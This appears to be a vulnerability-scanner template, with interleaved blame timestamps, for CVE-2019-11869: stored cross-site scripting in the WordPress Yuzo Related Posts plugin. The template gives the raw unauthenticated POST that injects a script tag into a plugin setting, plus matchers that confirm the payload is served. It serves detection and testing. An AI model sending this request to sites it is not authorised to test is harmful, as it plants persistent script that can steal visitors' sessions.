2021-01-02 04:59:06 +00:00
id : CVE-2019-11869
2020-12-25 08:21:48 +00:00
info :
2022-08-12 00:45:50 +00:00
name : WordPress Yuzo <5.12.94 - Cross-Site Scripting
2020-12-25 08:21:48 +00:00
author : ganofins
severity : medium
description : |
2022-08-12 00:45:50 +00:00
WordPress Yuzo Related Posts plugin before 5.12.94 is vulnerable to cross-site scripting
2020-12-25 08:21:48 +00:00
because it mistakenly expects that is_admin() verifies that the
request comes from an admin user (it actually only verifies that the
2022-08-12 00:45:50 +00:00
request is for an admin page). An unauthenticated attacker can consequently inject
2020-12-25 08:21:48 +00:00
a payload into the plugin settings, such as the
yuzo_related_post_css_and_style setting.
2023-09-27 15:51:13 +00:00
impact : |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 12:53:28 +00:00
remediation : |
Update to the latest version of the Yuzo plugin (5.12.94 or higher) to mitigate this vulnerability.
2021-08-18 11:37:49 +00:00
reference :
2020-12-25 08:21:48 +00:00
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild
- https://wpscan.com/vulnerability/9254
2022-05-17 09:18:12 +00:00
- https://www.wordfence.com/blog/2019/04/yuzo-related-posts-zero-day-vulnerability-exploited-in-the-wild/
- https://wpvulndb.com/vulnerabilities/9254
2022-08-12 00:45:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2019-11869
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-11869
cwe-id : CWE-79
2023-11-20 10:14:14 +00:00
epss-score : 0.00291
2023-12-12 11:07:52 +00:00
epss-percentile : 0.65616
2023-09-06 12:53:28 +00:00
cpe : cpe:2.3:a:yuzopro:yuzo:5.12.94:*:*:*:*:wordpress:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : yuzopro
product : yuzo
2023-09-06 12:53:28 +00:00
framework : wordpress
2023-12-05 09:50:33 +00:00
tags : wpscan,cve,cve2019,wordpress,wp-plugin,xss,yuzopro
2020-12-25 08:21:48 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-12-25 08:21:48 +00:00
- raw :
- |
POST /wp-admin/options-general.php?page=yuzo-related-post HTTP/1.1
Host : {{Hostname}}
Content-Type : application/x-www-form-urlencoded
yuzo_related_post_css_and_style=</style><script>alert(0);</script>
- |
GET / HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
2020-12-25 09:56:00 +00:00
- type : dsl
dsl :
2021-03-24 23:28:50 +00:00
- 'contains(body_2, "<script>alert(0);</script>")'
2020-12-25 09:56:00 +00:00
- type : dsl
dsl :
2023-06-19 21:10:30 +00:00
- "contains(tolower(header_2), 'text/html')"
2023-12-29 09:30:44 +00:00
# digest: 4a0a00473045022010577c9f3b6fb59d7f8b9d77c9d9aabba0d301a943e1750c3dbfe29bd71cf6c6022100c9885b608a0d2fb07affa5a859f5acb8c1b78c31434974124e7c14f916ae12c1:922c64590222798bb761d5b6d8e72950